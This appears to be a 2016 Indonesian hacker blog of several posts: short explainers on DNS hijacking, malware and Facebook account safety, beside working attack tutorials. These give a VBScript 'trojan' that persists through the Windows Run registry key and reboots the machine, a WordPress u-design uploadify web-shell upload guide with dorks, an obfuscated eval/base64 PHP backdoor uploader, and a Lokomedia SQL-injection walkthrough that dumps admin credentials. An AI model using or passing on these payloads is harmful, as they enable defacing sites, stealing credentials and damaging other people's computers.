Sabtu, 16 Juli 2016

DNS Hijacking

Pengertian

DNS HIJACKING atau DNS redirection adalah praktek menumbangkan resolusi Domain Name System (DNSquery. Hal ini dapat dicapai dengan malware yang menimpa konfigurasi TCP / IP komputer untuk menunjuk server DNSnakal di bawah kendali penyerang, atau melalui memodifikasi perilaku server DNS terpercayasehingga tidak sesuai dengan standar internet. 

Modifikasi ini dapat dibuat untuk tujuan berbahaya seperti phishing, atau untuk tujuan egois oleh penyedia layanan Internet (ISP) dan masyarakat / penyedia DNS server secara online berbasis router untuk pengguna langsung 'lalu lintas web ke server web ISP sendiri di mana iklan dapatdilayanistatistik yang dikumpulkan, atau tujuan lain dari ISPdan oleh penyedia layanan DNSuntuk memblokir akses ke domain yang dipilih sebagai bentuk sensor.

Oh iya pasti lu semua udah denger kabar kan kalo search engine besar kek google diretas sama team thoriq eh team madleets? nah denger denger kabar juga kalo itu menggunakan DNS HIJACKING yang sampe beritanya nyentuh belahan bumi disono :3 




Tujuan

tujuan yang dilakukan nya DNS Hijacking oleh para kaum hacker kesannya persis kayak cracker namun yg menggunakan DNS Hijacking pengaruh nya lebih parah dari pada para cracker, biasanya tujuan utama mencuri data dan pendukung lain.




Jenis Jenis  Hijacking 

-Page Hijacking 
-Hijack Attack
-BlueJacking
-Browser Hijacking
-Domain Hijacking 
-Hijack this
-Ip Hijacking
-Session hijacking 



Oke sekian aja artikel tentang DNS Hijacking semoga menambah wawasan para pembaca sekalian :D
























Pengertian Trojan

Nah sebelom nya gue udh share tentang membuat virus trojan dan gue post aja sekalian pengertian nya :p ok cekidot bro neh dibawah.
Trojan adalah program yang dibuat seperti program baik dan berguna pada pengguna komputer (crack, game, atau program lain) yang ketika diinstal ke dalam komputer dapat memata-matai, mencuri data, dan mengirimkan ketukan keyboard ke alamat yang telah ditentukan oleh pembuatnya tanpa diketahui oleh si pengguna komuter tersebut. 

Pengertian Worm

Worm adalah Malware yang bisa mengaktifkan dirinya sendiri tanpa adanya bantuan dari pihak ketiga. Yang artinya, jika worm sudah berhasil masuk dalam sebuah komputer atau jaringan komputer maka worm ini akan dapat berpindah ke komputer lain di dalam sebuah jaringan secara otomatis tanpa dapat dicegah oleh pemilik komputer lain yang ada di dalam jaringan tersebut.
Pasti lo bertanya, kalau worm bisa menyebarkan diri tanpa bantuan pihak ke tiga kenapa harus repot membuat virus yang membutuhkan tindakan pihak ketiga untuk mengaktifkannya. Worm hanya dapat menginfeksi sebuah komputer jika dia menemukan sebuah celah keamanan (vulnerability) sebuah software yang ada di dalam komputer tersebut, misalnya: windows office, Adobe, atau software terkenal lainnya yang sering menjadi sasaran. Worm tidak akan mampu menginfeksi sebuah sistem komputer bila celah keamanan (vulnerability) di dalam jaringan komputer itu sudah ditutup/ ditambal (patch). Yang artinya, virus akan lebih mudah menginfeksi jaringan komputer yang ter-patch dibanding dengan worm.

Pengertian Malware

Malware adalah program komputer yang diciptakan dengan maksud dan tujuan utama mencari kelemahan software. Umumnya Malware diciptakan untuk membobol atau merusak suatu software atau operating sistem

Malicious software atau yang sering kita sebut dengan malware adalah sebuah program atau aplikasi yang diciptakan untuk mengubah, merusak, dan mencuri data orang lain. Target dari malware itu sendiri sangat beragam sesuai dengan keinginan penciptanya, seperti untuk memata-matai orang lain, mengambil informasi penting yang dimiliki orang lain, dan masih banyak lagi.

Malware, singkatan dari Malicious Software adalah program yang didesain untuk mengganggu operasi komputer, mengumpulkan informasi-informasi sensitif, ataupun mengakses ke dalam sistem komputer tanpa izin. Walaupun pengertiannya adalah software/program, malware juga dapat berupa script atau kode. Istilah malware secara umum digunakan untuk menggambarkan program atau kode yang dimaksudkan untuk mengeksploitasi komputer, atau data-data yang terdapat di dalamnya, tanpa persetujuan. Termasuk untuk menggambarkan program atau kode yang bersifat merusak, berbahaya dan mengganggu.

Cara Membuat Virus Trojan

Cara Membuat Virus Trojan - Trojan adalah  program yang dibuat seperti program baik dan berguna pada pengguna komputer (crack, game, atau program lain) yang ketika diinstal ke dalam komputer dapat memata-matai, mencuri data, dan mengirimkan ketukan keyboard ke alamat yang telah ditentukan oleh pembuatnya tanpa diketahui oleh si pengguna komuter tersebut.
Mudah-mudahanan aja lo ngerti deh yg gue jelasin :v 
Langsung aja 

Open notepad lu > All progam > notepad 
Copas script berikut :  

set FSobj=CreateObject(“Scripting.FileSystemObject”)
set sysDir = FSobj.GetSpecialFolder(1)
createRegKey “HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\dlRB”,sysDir&”\dlRB.vbs”
sub createRegKey(regKey,regVal)
set regEdit = CreateObject(“WScript.Shell”)
regEdit.RegWrite regKey,regVal
end sub
set generateCopy=FSobj.CreateTextFile(sysDir+”\dlRB.vbs”)
generateCopy.close
set newFile = FSobj.OpenTextFile(WScript.ScriptFullname,1)
setFile()
fixedCode=replace(fileData,chr(94),”"”")
set procreateCopy=FSobj.OpenTextFile(sysDir+”\dlRB.vbs”,2)
procreateCopy.write fixedCode
procreateCopy.close
rebootSystem()
function setFile()
fileData=”rem – ^dlRB^ by D.L.” &vbcrlf& _
“strComputer = ^.^ ” &vbcrlf& _
“Set objWMIService = GetObject(^winmgmts:^ _ ” &vbcrlf& _
“& ^{impersonationLevel=impersonate,(Shutdown)}!\\^ & strComputer & ^\root\cimv2^)” &vbcrlf& _
“Set colOperatingSystems = objWMIService.ExecQuery _ ” &vbcrlf& _
“(^Select * from Win32_OperatingSystem^)” &vbcrlf& _
“For Each objOperatingSystem in colOperatingSystems” &vbcrlf& _
“ObjOperatingSystem.Reboot()” &vbcrlf& _
“Next”
end function
function rebootSystem()
strComputer = “.”
Set objWMIService = GetObject(“winmgmts:” _
& “{impersonationLevel=impersonate,(Shutdown)}!\\” & strComputer & “\root\cimv2″)
Set colOperatingSystems = objWMIService.ExecQuery _
(“Select * from Win32_OperatingSystem”)
For Each objOperatingSystem in colOperatingSystems
ObjOperatingSystem.Reboot()
Next
end function


Kalo dipikir secara logika ini adalah script untuk mereboot komputer, ok tanpa banyak bacot silahkan save dengan format.vbs  dan ojolali All files.
Virus ini akan berjalan dengan baik kalo lu klick , dan gue gamau nanggung :v 
Oke sekian Cara Membuat Virus Trojan  and terimakasih para pembaca semoga bermanfaat








Cara Mengamankan Akun Facebook

Cara Mengamankan Akun Facebook Anda Dari serangan Hacker 
Semakin cepatnya internet berkembang, dan banyak nya kaum remaja yang seringkali menggunakan social media seperti facebook,instagram,twitter dan masih banyak lagi. Facebook ialah salah satunya social media yang digunakan sebagian besar masyarakat indo, sudah banyak pelajar sampai orangtua menggunakan facebook dengan alasan menambah teman dan biar ga dikira kudet sama temannya, mungkin kalo orang dewasa alasan nya sih terhubung secara bebas ke seluruh saluran internet di seluruh dunia.




Berikut beberapa metode yang biasa dilakukan para hacker :

1.Phising Account

phising account ialah salah satu cara yang digunakan kaum hacker untung meng hack facebook dengan menggunakan fake form login yang menyerupai situs aslinya.


2.Bruteforce Account 

Meretas password (Password Cracking) dengan mencoba semua kombinasi yang ada pada Wordlist


3.Bruteforce Email Account

metode ini sama halnya dengan di atas, cuman yang ini si hacker mencari tahu seluk beluk tentang akun anda, dan cara kerjanya si hacker/ penyerang telah memiliki akun email anda.



Cara melindungi : 


1.jika anda online di warnet jangan pernah lupa yang namanya logout :v
2.gunakan password yang susah dimengerti ex :1231rnji2344nn
3.tidak memberikan password facebook ke siapapun
4.merahasiakan informasi agar peretas sulit menemui email atau pertanyaaan di di email anda
5.ganti password di hari tertentu atau yg sudah anda jadwalkan








Nah sekarang sudah paham kan beberapa tips dari gue untuk mengamankan akun facebook dari hacker dan sekian tips Mengamankan akun facebook semoga bermanfaat gaes dan membantu, terimakasih sudah baca di blog gue.


















Kamis, 14 Juli 2016

Deface Menggunakan Wp Content U-design

hello gaes :D 
langsung aja tanpa banyak bacot 




Dork : inurl:themes/u-design/ ext:jpg > image
"index of /'' ''uploadify.php'' ''wp-content"


Auto Xploit :  http://itloker.com/capca.php 

Exploit : /wp-content/themes/u-design//scripts/admin/uploadify/uploadify.php 



1. open dork di Search Engine lalu tambahkan exploit 


                                                       (yang vuln laman kosong seperti di ss)


2.copas link yang laman kosong ke Auto Xploit 









3. klick look bitch dan klick choose file, nah kalian upload shell berekstensi php jika sudah klick crootz 











4. nah kalo bener ada angka 1 gini dan jika begini shell kalian sudah terupload :3 
   Letak shell : wwwtarget.com/namashell.php






 btw gue make shell indoxploit :3 nah ok setelah shell masuk bebas diapain aja tuh site







Nah oke sekian aja gue share tutorial deface menggunakan wp content, tetep berkarya guys!! 
Selamat malam dan sampai jumpa beb :* 




















Download Script Uploader.php Team Madleets

Nah mungkin udah banyak yg share juga nih script ya tapi tak apa lah yg penting post :3
Langsung saja silahkan di copy bro! 





<?php
if($_GET['mad'] == 'leets'){
$a1 = 
 
'ZZFRS8MwEMefLfQ73OIgGzjmiy+uLb5YFAQHc09jlDS90WDShDQVNvG7myybDn273P3u/7/LIW810Ixj59AWy6clrDumEO4hqwu6SBM
 
MgGlNNYT8ZHpO0Wx+AdBsp60Cxp3QXU4IKHStbnJidO8IYMfd3mBO1CCdMMy6eeBnDXOMQBDOyWCkZg1aAqK5eF16iM4MDqLSTkg8t8a
 
4Fwcf392S4gTGYuWlyKmpH2olXHSI+TRJkw8mB19cHy19d20Lv07ngGupbX5dlmXRMv6ODdR7OGhVC5xZrV02D1iRHZc5Dip2ExhXy9f
 
V24YGA7qFPIezNEzhM02uPPTAtdlPxlX5/PK42tCwAN1uqFOmClPT7Q38K8bC1GtA/I+oCquBc+x7GI3oAr68Psoe/0IlE/KH+Pq94en
 
wdPEN';
    eval(gzinflate(base64_decode($a1)));
}
?>





Apa sih kegunaan nih script?
biasanya digunakan para mastah buat Sql Lokomedia, jika ga bisa upload shell biasanya pake nih script.


Oke gaes selamat malam and sampai jumpa

Deface Menggunakan SQL Lokomedia

Yap, ini post pertama kali dan gue akan share sedikit tutor deface dengan Sql lokomedia
Langsung aja Deface Menggunakan SQL Injection CMS lokomedia


Dork : - inurl:kategori-23-hiburan.html
           - inurl:hal-tentang-kami.html
           - inurl:statis-1-pengantar.html
           - inurl:statis-19-beasiswa.html
           - inurl:statis-22-kerjasama.html

kalian kembangin dork nya lagi, supaya dapat yang vuln/bisa di deface

Exploit : 'union select /*!50000Concat*/(username,0x20,password)+from+users--+--+


1. Copy salah satu dork di atas, dan paste di Search Engine (Google) 
2. Pilih salah satu target lalu masukin Exploit nya
seperti ini : target.com/statis--7'union%20select%20/*!50000Concat*/(username,0x20,password)+from+users--+--+hiburan.html

                                       (vuln biasanya di title nampak admin sama kode" gitu)



3. tekan CTRL+U untuk melihan lebih jelas nya tuh username sama pass 



Nah itu yang gue tandain 
Username : admin 
Pass : ee26a843418007e717fff651377da82c
karena pass masih dalam bentuk MD5 maka harus di decrypt (terjemah)



4. open HashKiller >  https://hashkiller.co.uk/md5-decrypter.aspx < dan masukan kode" tersebut 






     
Nah setelah terlihat pass tersebut langsung saja go to admin login gaes 
biasanya admin login terletak di : 
www.target.com/admin
www.target.com/adminweb
www.target.com/administrator
- www.target.com/redaktur


Nah setelah login maka bebas mau kalian apakan 
dah ah gue mau bobo ganteng dulu :3


Mudah kan pake sql lokomedia? 
pesan dari gue, not found bkn berati akhir bro jadi pantang menyerah aja 


Oh iya bila ada kesalahan silahkan di benarkan di kolom komentar kak
yang mau ngasih saran langsung koment aja gaes :*  
gue sekedar share tutorial yang niatan untuk membantu newbie kek gue :'D 
Sekian dan semoga bermanfaat.. thanks para pembaca


./Thoriqul